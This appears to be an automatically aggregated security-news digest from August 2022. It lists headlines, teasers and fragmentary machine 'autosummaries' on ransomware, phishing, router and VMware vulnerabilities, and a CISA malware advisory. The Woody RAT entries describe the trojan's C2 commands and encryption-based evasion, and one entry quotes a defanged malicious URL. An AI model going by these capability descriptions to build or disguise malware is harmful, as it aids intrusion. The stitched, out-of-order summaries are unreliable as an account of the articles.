                2022-08-04 https://www.helpnetsecurity.com/2022/08/04/stay-ahead-of-cybersecurity-challenges-video/

                The onslaught of ransomware attacks has catapulted cybersecurity to the forefront of global business operations. However, just 36% of mid-sized organizations still don’t have a formal incident response plan in place, according to research from Egnyte. In this Help Net Security video, Neil Jones, Director of Cybersecurity Evangelism at Egnyte, discusses how organizations can stay one step ahead of cybersecurity challenges.

                The post How can organizations stay ahead of cybersecurity challenges? appeared first on Help Net Security.

                "

                Autosummary: "


                A third of organizations experience a ransomware attack once a week

                exploits ransomware
                2022-08-04 https://www.helpnetsecurity.com/2022/08/04/organizations-experience-ransomware-attack/

                Ransomware attacks show no sign of slowing. According to new research published by Menlo Security, a third of organizations experience a ransomware attack at least once a week, with one in 10 experiencing them more than once a day. The research, conducted among 500+ IT security decision makers at US and UK organizations with more than 1,000 employees, highlights the impact this is having on security professionals’ own wellbeing. When asked what keeps them awake … More

                The post A third of organizations experience a ransomware attack once a week appeared first on Help Net Security.

                "

                Autosummary: According to the report, around half of organizations (61% US and 44% UK) have been the victim of a successful ransomware attack in the last 18 months, with customers and prospects the most likely entry point for an attack. "


                Qualys CyberSecurity Asset Management 2.0 with EASM identifies unknown internet-facing assets

                ciber
                2022-08-04 https://www.helpnetsecurity.com/2022/08/04/qualys-cybersecurity-asset-management-2-0-with-easm/

                Qualys announced it is adding External Attack Surface Management (EASM) capabilities to the Qualys Cloud Platform. Integrated into CyberSecurity Asset Management 2.0, the new component adds the external attacker view to identify previously unknown internet-facing assets for a complete and accurate picture of the enterprise attack surface. Digital transformation, increased adoption of cloud and Internet of Things (IoT), a growing remote workforce, and a technology talent shortage have led to an exponential rise in organizations’ … More

                The post Qualys CyberSecurity Asset Management 2.0 with EASM identifies unknown internet-facing assets appeared first on Help Net Security.

                "

                Autosummary: It also helps synchronize with CMDBs, detect security gaps like unauthorized or end-of-support software, open ports, remotely exploitable vulnerabilities, digital certificate issues, unsanctioned apps and domains, and mitigate risk by taking appropriate actions. "


                Rimini Protect provides zero-day security protection against known and unknown vulnerabilities

                exploits
                2022-08-04 https://www.helpnetsecurity.com/2022/08/04/rimini-protect/

                Rimini Street has launched Rimini Protect, a new suite of security solutions that is always on and provides a layer of security that surrounds and protects enterprise IT infrastructure and applications. Rimini Street has provided “zero-day” security solutions for our clients’ enterprise software applications, middleware, and databases, and these solutions are now available with additional new offerings in the new Rimini Protect suite. Security protection is a top priority A data breach can harm organizations … More

                The post Rimini Protect provides zero-day security protection against known and unknown vulnerabilities appeared first on Help Net Security.

                "

                Autosummary: Some organizations still primarily rely on reports and patches from their software vendor for protection against attacks, but this strategy may have several shortcomings: Dangerous limitations – do not address custom code, unsupported releases, or unknown vulnerabilities. Not timely – can take weeks, months, or even years to be delivered by a software vendor – and sometimes no patch is provided at all. Labor-intensive – may require a product or technology upgrade and might need to be regression tested before rolling into production. Ongoing risk – may not be adequate to sufficiently protect against an identified vulnerability. Rimini Street is already a trusted partner for security Organizations trust Rimini Street with supporting their mission-critical applications and data, and many of those clients have already expanded their Rimini Street relationship to include security solutions. "


                Hackers Exploited Atlassian Confluence Bug to Deploy Ljl Backdoor for Espionage

                exploits
                2022-08-04 https://thehackernews.com/2022/08/hackers-exploited-atlassian-confluence.html
                A threat actor is said to have "highly likely" exploited a security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector. The attack, which transpired over a seven-day period at the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch "

                Autosummary: "


                New Linux malware brute-forces SSH servers to breach networks

                exploits
                2022-08-04 https://www.bleepingcomputer.com/news/security/new-linux-malware-brute-forces-ssh-servers-to-breach-networks/
                A new botnet called "RapperBot" has emerged in the wild since mid-June 2022, focusing on brute-forcing its way into Linux SSH servers and then establishing persistence. [...] "

                Autosummary: Mirai-based, but different The new botnet was discovered in the wild by threat hunters at Fortinet, who noticed the IoT malware featured some unusual SSH-related strings and decided to investigate further. "


                Cybersecurity agencies reveal last year’s top malware strains

                exploits ciber
                2022-08-04 https://www.bleepingcomputer.com/news/security/cybersecurity-agencies-reveal-last-year-s-top-malware-strains/
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a list of the topmost detected malware strains last year in a joint advisory with the Australian Cyber Security Centre (ACSC). [...] "

                Autosummary: "


                German Chambers of Industry and Commerce hit by "massive" cyberattack

                industry ciber
                2022-08-04 https://www.bleepingcomputer.com/news/security/german-chambers-of-industry-and-commerce-hit-by-massive-cyberattack/
                The Association of German Chambers of Industry and Commerce (DIHK) was forced to shut down all of its IT systems and switch off digital services, telephones, and email servers, in response to a cyberattack. [...] "

                Autosummary: "


                Ransomware protection with Malwarebytes EDR: Your FAQs, answered!

                exploits
                2022-08-04 https://blog.malwarebytes.com/business/2022/08/ransomware-protection-with-malwarebytes-edr-your-faqs-answered/

                Malwarebytes security experts answer some of your most frequently asked questions about ransomware and how our EDR can help.

                The post Ransomware protection with Malwarebytes EDR: Your FAQs, answered! appeared first on Malwarebytes Labs.

                "

                Autosummary: Fourth, it should have features that are valuable for detecting and thwarting malware in general, such as exploit prevention, behavioral detection of never-before-seen malware, malicious website blocking, and brute force protection.” And perhaps most importantly, all of this is offered through the ‘single pane of glass’ that Zamani mentioned earlier—meaning you can easily manage endpoints to prevent threats from entering, detect infections that find their way into your environment, and remediate with one click, keeping your servers and workstations secure against ransomware while keeping your end users productive.” Ransomware, on the other hand, immediately encrypts files and sometimes locks down vital system settings used for recovery, as well as deleting locally stored backups, and it’s often used against multiple endpoints at the same time. David Pier, Senior Sales Engineer at Malwarebytes: “That is something we hear very frequently at Malwarebytes; customers are coming from other EDR solutions or other security solutions, and a large concern is your team may only be two to three, maybe five people at most. "


                AA22-216A: 2021 Top Malware Strains

                exploits
                2022-08-04 https://us-cert.cisa.gov/ncas/alerts/aa22-216a
                Original release date: August 4, 2022

                Summary

                Immediate Actions You Can Take Now to Protect Against Malware:

                • Patch all systems and prioritize patching known exploited vulnerabilities.
                • Enforce multifactor authentication (MFA).
                • Secure Remote Desktop Protocol (RDP) and other risky services.
                • Make offline backups of your data.
                • Provide end-user awareness and training about social engineering and phishing.

                This joint Cybersecurity Advisory (CSA) was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA) and the Australian Cyber Security Centre (ACSC). This advisory provides details on the top malware strains observed in 2021. Malware, short for “malicious software,” can compromise a system by performing an unauthorized function or process. Malicious cyber actors often use malware to covertly compromise and then gain access to a computer or mobile device. Some examples of malware include viruses, worms, Trojans, ransomware, spyware, and rootkits.[1]

                In 2021, the top malware strains included remote access Trojans (RATs), banking Trojans, information stealers, and ransomware. Most of the top malware strains have been in use for more than five years with their respective code bases evolving into multiple variations. The most prolific malware users are cyber criminals, who use malware to deliver ransomware or facilitate theft of personal and financial information.

                CISA and ACSC encourage organizations to apply the recommendations in the Mitigations sections of this joint CSA. These mitigations include applying timely patches to systems, implementing user training, securing Remote Desktop Protocol (RDP), patching all systems especially for known exploited vulnerabilities, making offline backups "

                Autosummary: Some examples of malware include viruses, worms, Trojans, ransomware, spyware, and rootkits.[1] In 2021, the top malware strains included remote access Trojans (RATs), banking Trojans, information stealers, and ransomware. "


                Phishing campaign targets Coinbase wallet holders to steal cryptocurrency in real-time

                financial
                2022-08-04 https://www.helpnetsecurity.com/2022/08/04/coinbase-phishing-video/

                In this video for Help Net Security, Nick Ascoli, VP of Threat Research, PIXM, discusses a multilayered phishing campaign targeting cryptocurrency exchange Coinbase. Attackers are sending out spoofed Coinbase emails to harvest personal credentials and use them to log into users’ legitimate accounts in real-time. How the Coinbase phishing attack works The attackers presented users with a notification that their account needed attention due to an urgent matter (e.g., a locked account or a transaction confirmation). Users were … More

                The post Phishing campaign targets Coinbase wallet holders to steal cryptocurrency in real-time appeared first on Help Net Security.

                "

                Autosummary: "


                Critical RCE Bug Could Let Hackers Remotely Take Over DrayTek Vigor Routers

                exploits
                2022-08-04 https://thehackernews.com/2022/08/critical-rce-bug-could-let-hackers.html
                As many as 29 different router models from DrayTek have been identified as affected by a new critical, unauthenticated, remote code execution vulnerability that, if successfully exploited, could lead to full compromise of the device and unauthorized access to the broader network. "The attack can be performed without user interaction if the management interface of the device has been configured "

                Autosummary: "


                New Woody RAT Malware Being Used to Target Russian Organizations

                exploits
                2022-08-04 https://thehackernews.com/2022/08/new-woody-rat-malware-being-used-to.html
                An unknown threat actor has been targeting Russian entities with a newly discovered remote access trojan called Woody RAT for at least a year as part of a spear-phishing campaign. The advanced custom backdoor is said to be delivered via either of two methods: archive files and Microsoft Office documents leveraging the now-patched "Follina" support diagnostic tool vulnerability (CVE-2022-30190) "

                Autosummary: "


                Don’t get singed by scammers while you’re carrying the torch for Tinder

                financial
                2022-08-04 https://www.welivesecurity.com/2022/08/04/protect-yourself-scammers-tinder-dating-app/

                Are you on Tinder? With 75 million monthly active users, you might be able to find the right one. However there are also traps you need to look out for. Read more about catfishing, sextortion, phishing and other practices used by scammers.

                The post Don’t get singed by scammers while you’re carrying the torch for Tinder  appeared first on WeLiveSecurity

                "

                Autosummary: pic.twitter.com/9nDDQtCtky — Twist (@Twist_83) August 2, 2021 Sextortion “Sending nudes” and “sexting,” two activities that are just as popular as they are deeply risky, make you an easy target for scammers to take advantage of. Remember, if you’re going to play with matches, make sure you don’t get burned. For more information and tips to stay safe while surfing for love, come back next week, as we will cover dating apps privacy settings. This is what we’ve seen recently on the Netflix documentary Tinder Swindler, which tells the story of several women scammed by the same man — a real person, a profile with several pictures, linked social media accounts and even photo verification, who managed to steal US$10 million after love bombing his victims and luring them into financing his luxury lifestyle. https://t.co/XD3xWnwKJw #DataSpotlight #ValentinesDay2022 pic.twitter.com/zykQmNwlfn — FTC (@FTC) February 11, 2022 The human factor Truth be told, we all portray our best self when going on a date, hiding that ugly side we all seem to have. Generally, these profiles use stock images that seem like they come directly from a model agency catalog or, taking the opposite path, they use super amateur, blurry and sexually suggestive images. "


                Taiwan Government websites suffered DDoS attacks during the Nancy Pelosi visit

                government
                2022-08-04 https://securityaffairs.co/wordpress/133997/breaking-news/taiwan-hit-cyberattacks.html

                Taiwan government websites were temporarily forced offline by cyber attacks during the visit to Taipei of US House Speaker Nancy Pelosi. Major Taiwan government websites were temporarily forced offline by distributed denial of service (DDoS) attacks during the visit to Taipei of US House Speaker Nancy Pelosi. The cyber attacks forced offline the government […]

                The post Taiwan Government websites suffered DDoS attacks during the Nancy Pelosi visit appeared first on Security Affairs.

                "

                Autosummary: The group (also known as Cicada, Stone Panda, MenuPass group, Bronze Riverside, and Cloud Hopper) has been active at least since 2009, in April 2017 experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide. "


                Ransomware review: July 2022

                exploits
                2022-08-04 https://blog.malwarebytes.com/threat-intelligence/2022/08/ransomware-review-july-2022/

                BlackBasta lined up behind LockBit as the second most prevalent ransomware in July, a number of new gangs appeared, and an old one reappeared

                The post Ransomware review: July 2022 appeared first on Malwarebytes Labs.

                "

                Autosummary: Known ransomware attacks by group, July 2022 Known ransomware attacks by country, July 2022 Known ransomware attacks by industry sector, July 2022 LockBit We wrote extensively about LockBit, and the appearance of LockBit 3.0, in last month’s ransomware review. Posted: August 4, 2022 by BlackBasta lined up behind LockBit as the second most prevalent ransomware in July, a number of new gangs appeared, and an old one reappeared Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their Dark Web leak sites. Two other gangs linked to Conti, Hive and KaraKurt, were also very active during July, ensuring that the gang behind “the costliest strain of ransomware ever documented” by the FBI continues to cast a long shadow, despite the retirement of the Conti “brand”. "


                Seemplicity collaborates with Checkmarx to improve visibility and operational efficiency for organizations

                government
                2022-08-04 https://www.helpnetsecurity.com/2022/08/05/seemplicity-checkmarx/

                Seemplicity announced that it has partnered with Checkmarx, a provider of developer-centric application security testing (AST) solutions. The partnership will see the Checkmarx One Platform integrated within Seemplicity’s Productivity Platform, allowing joint customers to simplify the entire find-to-fix lifecycle and ultimately accelerate the time to remediation of vulnerabilities found throughout the software development lifecycle (SDLC). The integration brings security findings discovered by Checkmarx into Seemplicity’s platform that provides a unified picture and workspace for risks … More

                The post Seemplicity collaborates with Checkmarx to improve visibility and operational efficiency for organizations appeared first on Help Net Security.

                "

                Autosummary: "


                Kion and Booz Allen Hamilton help government agencies manage their multi-cloud environments

                government
                2022-08-04 https://www.helpnetsecurity.com/2022/08/05/kion-booz-allen-hamilton/

                Kion has partnered with Booz Allen Hamilton. This partnership will join Kion’s cloud enablement solution with Booz Allen’s technology transformation and managed services expertise to provide government clients with complete cloud management and governance capabilities. As application migration initiatives and the adoption of cloud-native capabilities accelerate across the public sector, more agencies are facing challenges in their multi-cloud environments. These challenges include manual labor to manage daily operations and security threats, along with a lack … More

                The post Kion and Booz Allen Hamilton help government agencies manage their multi-cloud environments appeared first on Help Net Security.

                "

                Autosummary: “Kion is a self-hosted software solution that works across AWS, Azure, and Google Cloud, along with air-gapped regions deployed across different security fabrics – attributes that are extremely important to our government customers,” said Brian Price, CEO and co-founder of Kion. "


                Critical RCE vulnerability impacts 29 models of DrayTek routers

                exploits
                2022-08-04 https://www.bleepingcomputer.com/news/security/critical-rce-vulnerability-impacts-29-models-of-draytek-routers/
                Researchers at Trellix have discovered a critical unauthenticated remote code execution (RCE) vulnerability impacting 29 models of the DrayTek Vigor series of business routers. [...] "

                Autosummary: LTE Series, Vigor2862 Series, Vigor2862 LTE Series, Vigor2620 LTE Series, VigorLTE 200n, Vigor2133 Series, Vigor2762 Series, Vigor167, Vigor130, VigorNIC 132, Vigor165, Vigor166, Vigor2135 Series, Vigor2765 Series, Vigor2766 "


                Ransomware review: July 2022

                exploits
                2022-08-04 https://www.malwarebytes.com/blog/news/2022/08/ransomware-review-july-2022

                Categories: Threat Intelligence

                Tags: conti

                Tags: lockbit

                Tags: ransomware

                BlackBasta lined up behind LockBit as the second most prevalent ransomware in July, a number of new gangs appeared, and an old one reappeared


                The post Ransomware review: July 2022 appeared first on Malwarebytes Labs.

                "

                Autosummary: Known ransomware attacks by group, July 2022 Known ransomware attacks by country, July 2022 Known ransomware attacks by industry sector, July 2022 LockBit We wrote extensively about LockBit, and the appearance of LockBit 3.0, in last month's ransomware review. Posted: August 4, 2022 by BlackBasta lined up behind LockBit as the second most prevalent ransomware in July, a number of new gangs appeared, and an old one reappeared Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their Dark Web leak sites. Two other gangs linked to Conti, Hive and KaraKurt, were also very active during July, ensuring that the gang behind “the costliest strain of ransomware ever documented” by the FBI continues to cast a long shadow, despite the retirement of the Conti "brand". "


                Ransomware protection with Malwarebytes EDR: Your FAQs, answered!

                exploits
                2022-08-04 https://www.malwarebytes.com/blog/business/2022/08/ransomware-protection-with-malwarebytes-edr-your-faqs-answered

                Categories: Business

                Tags: Anti-Ransomware

                Tags: business

                Tags: detection

                Tags: EDR

                Tags: Nebula

                Tags: prevention

                Tags: ransomware

                Malwarebytes security experts answer some of your most frequently asked questions about ransomware and how our EDR can help.


                The post Ransomware protection with Malwarebytes EDR: Your FAQs, answered! appeared first on Malwarebytes Labs.

                "

                Autosummary: Fourth, it should have features that are valuable for detecting and thwarting malware in general, such as exploit prevention, behavioral detection of never-before-seen malware, malicious website blocking, and brute force protection.” And perhaps most importantly, all of this is offered through the ‘single pane of glass’ that Zamani mentioned earlier—meaning you can easily manage endpoints to prevent threats from entering, detect infections that find their way into your environment, and remediate with one click, keeping your servers and workstations secure against ransomware while keeping your end users productive.” Ransomware, on the other hand, immediately encrypts files and sometimes locks down vital system settings used for recovery, as well as deleting locally stored backups, and it's often used against multiple endpoints at the same time. David Pier, Senior Sales Engineer at Malwarebytes: “That is something we hear very frequently at Malwarebytes; customers are coming from other EDR solutions or other security solutions, and a large concern is your team may only be two to three, maybe five people at most. "


                87% of the ransomware found on the dark web has been delivered via malicious macros

                exploits ransomware
                2022-08-03 https://www.helpnetsecurity.com/2022/08/03/ransomware-malicious-macros/

                Venafi announced the findings of a dark web investigation into ransomware spread via malicious macros. Conducted in partnership with criminal intelligence provider Forensic Pathways between November 2021 and March 2022, the research analyzed 35 million dark web URLs, including marketplaces and forums, using the Forensic Pathways Dark Search Engine. The findings uncovered 475 webpages of sophisticated ransomware products and services, with several high-profile groups aggressively marketing ransomware-as-a-service. 87% of the ransomware found on the dark … More

                The post 87% of the ransomware found on the dark web has been delivered via malicious macros appeared first on Help Net Security.

                "

                Autosummary: Many strains of ransomware being sold — such as Babuk, GoldenEye, Darkside/BlackCat, Egregor, HiddenTear and WannaCry — have been successfully used in high-profile attacks. "


                Claroty xDome strengthens cyber and operational resilience for industrial enterprises

                industry
                2022-08-03 https://www.helpnetsecurity.com/2022/08/03/claroty-xdome/

                Claroty released Claroty xDome, a cloud-based industrial cybersecurity platform that drives cyber and operational resilience for modern industrial enterprises. Claroty xDome is the solution that delivers the ease and scalability of SaaS without compromising on the breadth or depth of the visibility, protection, and monitoring controls that are integral to the entire CPS security journey — especially amid the rapid expansion of CPS across the XIoT. According to Gartner, “Over time, the technologies that underpin … More

                The post Claroty xDome strengthens cyber and operational resilience for industrial enterprises appeared first on Help Net Security.

                "

                Autosummary: Claroty xDome is the solution that delivers the ease and scalability of SaaS without compromising on the breadth or depth of the visibility, protection, and monitoring controls that are integral to the entire CPS security journey — especially amid the rapid expansion of CPS across the XIoT. According to Gartner, “Over time, the technologies that underpin critical infrastructure have become more digitized and connected — either to enterprise IT systems and/or to each other — creating cyber-physical systems.” While other SaaS solutions rely solely on passive monitoring, xDome offers this plus other methods, giving customers both effective asset discovery and the ease and scalability of SaaS. A complete XIoT asset inventory is foundational to CPS security, and attaining it requires combining multiple asset discovery methods tailored to each environment’s unique needs. "


                Thousands of Solana wallets drained in attack using unknown exploit

                exploits
                2022-08-03 https://www.bleepingcomputer.com/news/security/thousands-of-solana-wallets-drained-in-attack-using-unknown-exploit/
                An overnight attack on the Solana blockchain platform drained thousands of software wallets of cryptocurrency worth millions of U.S. dollars. [...] "

                Autosummary: "The root cause is still not clear, but it appears to be due to a flaw in certain wallet software – rather than in the Solana blockchain itself" - Elliptic One clue that emerged from the attack is that the money-siphoning transactions are signed by the rightful owners, which points to a private key compromise. "


                35,000 code repos not hacked—but clones flood GitHub to serve malware

                exploits
                2022-08-03 https://www.bleepingcomputer.com/news/security/35-000-code-repos-not-hacked-but-clones-flood-github-to-serve-malware/
                Thousands of GitHub repositories were forked (cloned) and altered to include malware, a software engineer discovered. [...] "

                Autosummary: Software engineer Stephen Lacy first publicized the finding (Twitter). While reviewing an open source project Lacy had "found off a google search," the engineer noticed the following URL in the code, which he shared on Twitter: hxxp://ovz1.j19544519.pr46m.vps.myjino[.]ru BleepingComputer, like many, observed that when searching GitHub for this URL, there were 35,000+ search results showing files containing the malicious URL. "


                VMware: Patch this critical vulnerability immediately! (CVE-2022-31656)

                exploits
                2022-08-03 https://www.helpnetsecurity.com/2022/08/03/cve-2022-31656/

                VMware has released fixes for ten vulnerabilities, including CVE-2022-31656, an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager and vRealize Automation, which the company considers critical and advises to patch or mitigate immediately. While there is no indication that any of these flaws is currently being leveraged by attackers in the wild, the security researcher who reported CVE-2022-31656 is planning to release a technical writeup and a POC “soon”. About CVE-2022-31656 CVE-2022-31656 is … More

                The post VMware: Patch this critical vulnerability immediately! (CVE-2022-31656) appeared first on Help Net Security.

                "

                Autosummary: "


                Phishers use custom phishing kit to hijack MFA-protected enterprise Microsoft accounts

                financial
                2022-08-03 https://www.helpnetsecurity.com/2022/08/03/hijack-microsoft-accounts/

                An ongoing, large-scale phishing campaign is targeting owners of business email accounts at companies in the FinTech, Lending, Insurance, Energy and Manufacturing sectors in the US, UK, New Zealand and Australia, Zscaler researchers are warning. The attackers are using a variety of techniques and tactics to evade corporate email security solutions and a custom phishing kit that allows them to bypass multi-factor authentication (MFA) protection to hijack enterprise Microsoft accounts. Post compromise, the attackers have … More

                The post Phishers use custom phishing kit to hijack MFA-protected enterprise Microsoft accounts appeared first on Help Net Security.

                "

                Autosummary: An ongoing, large-scale phishing campaign is targeting owners of business email accounts at companies in the FinTech, Lending, Insurance, Energy and Manufacturing sectors in the US, UK, New Zealand and Australia, Zscaler researchers are warning. "


                VirusTotal Reveals Most Impersonated Software in Malware Attacks

                exploits
                2022-08-03 https://thehackernews.com/2022/08/virustotal-reveals-most-impersonated.html
                Threat actors are increasingly mimicking legitimate applications like Skype, Adobe Reader, and VLC Player as a means to abuse trust relationships and increase the likelihood of a successful social engineering attack. Other most impersonated legitimate apps by icon include 7-Zip, TeamViewer, CCleaner, Microsoft Edge, Steam, Zoom, and WhatsApp, an analysis from VirusTotal has revealed. "One of the "

                Autosummary: Other most impersonated legitimate apps by icon include 7-Zip, TeamViewer, CCleaner, Microsoft Edge, Steam, Zoom, and WhatsApp, an analysis from VirusTotal has revealed. "


                VMWare Urges Users to Patch Critical Authentication Bypass Bug

                exploits
                2022-08-03 https://threatpost.com/vmware-patch-critical-bug/180346/
                Vulnerability—for which a proof-of-concept is forthcoming—is one of a string of flaws the company fixed that could lead to an attack chain. "

                Autosummary: The other six bugs patched in the update include another RCE bug (CVE-2022-31665) rated as important; two privilege escalation vulnerabilities (CVE-2022-31660 and CVE-2022-31661) rated as important; a local privilege escalation vulnerability (CVE-2022-31664) rated as important; a URL Injection Vulnerability (CVE-2022-31657) rated as moderate; and a path traversal vulnerability (CVE-2022-31662) rated as moderate. "


                Microsoft accounts targeted with new MFA-bypassing phishing kit

                financial
                2022-08-03 https://www.bleepingcomputer.com/news/security/microsoft-accounts-targeted-with-new-mfa-bypassing-phishing-kit/
                A new large-scale phishing campaign targeting credentials for Microsoft email services uses a custom proxy-based phishing kit to bypass multi-factor authentication. [...] "

                Autosummary: The phishing campaign's targets include fin-tech, lending, accounting, insurance, and Federal Credit Union organizations in the US, UK, New Zealand, and Australia. "


                Cisco fixes critical remote code execution bug in VPN routers

                exploits
                2022-08-03 https://www.bleepingcomputer.com/news/security/cisco-fixes-critical-remote-code-execution-bug-in-vpn-routers/
                Cisco has fixed critical security vulnerabilities affecting Small Business VPN routers and enabling unauthenticated, remote attackers to execute arbitrary code or commands and trigger denial of service (DoS) conditions on vulnerable devices. [...] "

                Autosummary: "


                Bank fraud scammers trick victims with claims of bogus Zelle transfers

                financial
                2022-08-03 https://blog.malwarebytes.com/social-engineering/2022/08/bank-fraud-scammers-trick-victims-with-claims-of-bogus-zelle-transfers/

                We take a look at a scam attempt which makes great use of the fraudulent bank payment phone call. Here's what to look out for.

                The post Bank fraud scammers trick victims with claims of bogus Zelle transfers appeared first on Malwarebytes Labs.

                "

                Autosummary: [...] address, and other information doesn’t mean the caller is genuine. Posted: August 3, 2022. We take a look at a scam attempt which makes great use of the fraudulent bank payment phone call. The call also spoofs the caller ID of the bank, another easy-to-pull-off tactic which makes the call look more plausible. "


                Power semiconductor component manufacturer Semikron suffered a ransomware attack

                exploits ransomware industry
                2022-08-03 https://securityaffairs.co/wordpress/133975/cyber-crime/semikron-cyber-attack.html

                Semikron, a German-based independent manufacturer of power semiconductor components, suffered a ransomware cyberattack. Semikron employs more than 3,000 people in 24 subsidiaries worldwide, with production sites in Germany, Brazil, China, France, India, Italy, Slovakia and the USA. The company confirmed it has suffered a cyberattack conducted by a professional […]

                The post Power semiconductor component manufacturer Semikron suffered a ransomware attack appeared first on Security Affairs.

                "

                Autosummary: "


                Russian organizations attacked with new Woody RAT malware

                exploits
                2022-08-03 https://www.bleepingcomputer.com/news/security/russian-organizations-attacked-with-new-woody-rat-malware/
                Unknown attackers target Russian entities with newly discovered malware that allows them to control and steal information from compromised devices remotely. [...] "

                Autosummary: Woody Rat distribution vectors (Malwarebytes LABS). Its list of features includes collecting system information, listing folders and running processes, executing commands and files received from its command-and-control (C2) server, downloading, uploading, and deleting files on infected machines, and taking screenshots. "


                Cloned Atomic Wallet website is pushing Mars Stealer malware

                exploits
                2022-08-03 https://www.bleepingcomputer.com/news/security/cloned-atomic-wallet-website-is-pushing-mars-stealer-malware/
                A fake website impersonating the official portal for the Atomic wallet, a popular decentralized wallet that also operates as a cryptocurrency exchange portal, is, in reality, distributing copies of the Mars Stealer information-stealing malware. [...] "

                Autosummary: Genuine site left, fake site right. As for how people end up there, it might be through malvertising on social media, direct messages on various platforms, SEO poisoning, or spam email. "


                Spanish research agency still recovering after ransomware attack

                exploits ransomware
                2022-08-03 https://www.bleepingcomputer.com/news/security/spanish-research-agency-still-recovering-after-ransomware-attack/
                The Spanish National Research Council (CSIC) last month was hit by a ransomware attack that is now attributed to Russian hackers. [...] "

                Autosummary: "


                Windows 11 Smart App Control blocks files used to push malware

                exploits
                2022-08-03 https://www.bleepingcomputer.com/news/microsoft/windows-11-smart-app-control-blocks-files-used-to-push-malware/
                Smart App Control, a Windows 11 security feature that blocks threats at the process level, now comes with support for blocking several new file types threat actors have recently adopted to infect targets with malware in phishing attacks. [...] "

                Autosummary: After a bit of digging, BleepingComputer also discovered that .appref-ms, .bat, .cmd, .chm, .cpl, .js, .jse, .msc, .msp, .reg, .vbe, .vbs, .wsf "


                Woody RAT: A new feature-rich malware spotted in the wild

                exploits
                2022-08-03 https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/

                The Malwarebytes Threat Intelligence team has discovered a new Remote Access Trojan that we dubbed Woody Rat used to target Russian entities.

                The post Woody RAT: A new feature-rich malware spotted in the wild appeared first on Malwarebytes Labs.

                "

                Autosummary: IOCs (Woody Rat file hashes, C2 domains and IP address, the Follina document Памятка.docx and its hash, the Follina HTML file URL and the Woody Rat download URL) are listed in the original post. Data sent via the submit API includes: OS architecture, antivirus installed, computer name, OS build version, .NET information, PowerShell information, Python information (install path, version etc.), environment variables, network interfaces, administrator privileges, list of running processes, proxy information, username, and list of all the user accounts. The malware currently detects 6 AVs through registry keys. Woody Rat analysis: the threat actor has left some debugging information including a pdb path from which we derived and picked a name for this new Rat. A lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. The following diagram shows the overall attack flow used by the threat actor to drop Woody Rat (figure: Woody Rat distribution methods). Archive files: in this method, Woody Rat is packaged into an archive file and sent to victims. (Figures: document lure, debug information, RSA encryption routine, AES encryption routine, get_cookie_data function.) C2 HTTP endpoint request knock – this is the first HTTP request that the malware makes to the C2. _SET commands: PING – this command is used to set the sleep interval between every ping request to the C2; UPLD (Upload) – the Upload command is used to remotely upload a file to the infected machine. _REQ commands: EXEC (Execute) – executes the command received from the C2 by creating a cmd.exe process; the malware creates two named pipes and redirects the input and output to these pipes. Data encryption with HTTP requests: to evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. "


                Woody RAT: A new feature-rich malware spotted in the wild

                exploits
                2022-08-03 https://www.malwarebytes.com/blog/news/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild

                Categories: Threat Intelligence

                Tags: APT

                Tags: rat

                Tags: russia

                The Malwarebytes Threat Intelligence team has discovered a new Remote Access Trojan that we dubbed Woody Rat used to target Russian entities.


                The post Woody RAT: A new feature-rich malware spotted in the wild appeared first on Malwarebytes Labs.

                "

                Autosummary: IOCs (Woody Rat file hashes, C2 domains and IP address, the Follina document Памятка.docx and its hash, the Follina HTML file URL and the Woody Rat download URL) are listed in the original post. Data sent via the submit API includes: OS architecture, antivirus installed, computer name, OS build version, .NET information, PowerShell information, Python information (install path, version etc.), environment variables, network interfaces, administrator privileges, list of running processes, proxy information, username, and list of all the user accounts. The malware currently detects 6 AVs through registry keys. Woody Rat analysis: the threat actor has left some debugging information including a pdb path from which we derived and picked a name for this new Rat. A lot of CRT functions seem to be statically linked, which leads to IDA generating a lot of noise and hindering analysis. The following diagram shows the overall attack flow used by the threat actor to drop Woody Rat (figure: Woody Rat distribution methods). Archive files: in this method, Woody Rat is packaged into an archive file and sent to victims. (Figures: document lure, debug information, RSA encryption routine, AES encryption routine, get_cookie_data function.) C2 HTTP endpoint request knock - this is the first HTTP request that the malware makes to the C2. Data encryption with HTTP requests: to evade network-based monitoring the malware uses a combination of RSA-4096 and AES-CBC to encrypt the data sent to the C2. _REQ commands: EXEC (Execute) - executes the command received from the C2 by creating a cmd.exe process; the malware creates two named pipes and redirects the input and output to these pipes. The .NET DLLs are loaded by the malware and commands are executed via the methods present in these DLLs (SharpExecutor and PowerSession methods); we will look at the commands utilising these DLLs below: DN_B (DotNet Binary). Follina vulnerability: the threat actor is using a Microsoft Office document (Памятка.docx) that has been weaponized with the Follina (CVE-2022-30190) vulnerability to drop Woody Rat. PURG - unknown command; EXIT - exit the command execution thread. "


                Bank fraud scammers trick victims with claims of bogus Zelle transfers

                financial
                2022-08-03 https://www.malwarebytes.com/blog/news/2022/08/bank-fraud-scammers-trick-victims-with-claims-of-bogus-zelle-transfers

                Categories: Social engineering

                Tags: bank

                Tags: phone

                Tags: scam

                We take a look at a scam attempt which makes great use of the fraudulent bank payment phone call. Here's what to look out for.


                The post Bank fraud scammers trick victims with claims of bogus Zelle transfers appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: August 3, 2022. We take a look at a scam attempt which makes great use of the fraudulent bank payment phone call. The call also spoofs the caller ID of the bank, another easy-to-pull-off tactic which makes the call look more plausible. "


                FCC warns of steep rise in phishing over SMS

                financial
                2022-08-03 https://www.malwarebytes.com/blog/news/2022/08/sms-phishers-are-increasingly-attacking-americans-fcc-warns

                Categories: News

                Tags: PII

                Tags: smishing

                Tags: FCC

                Tags: SMS phishing

                Tags: Robokiller

                Tags: STIR

                Tags: SHAKEN

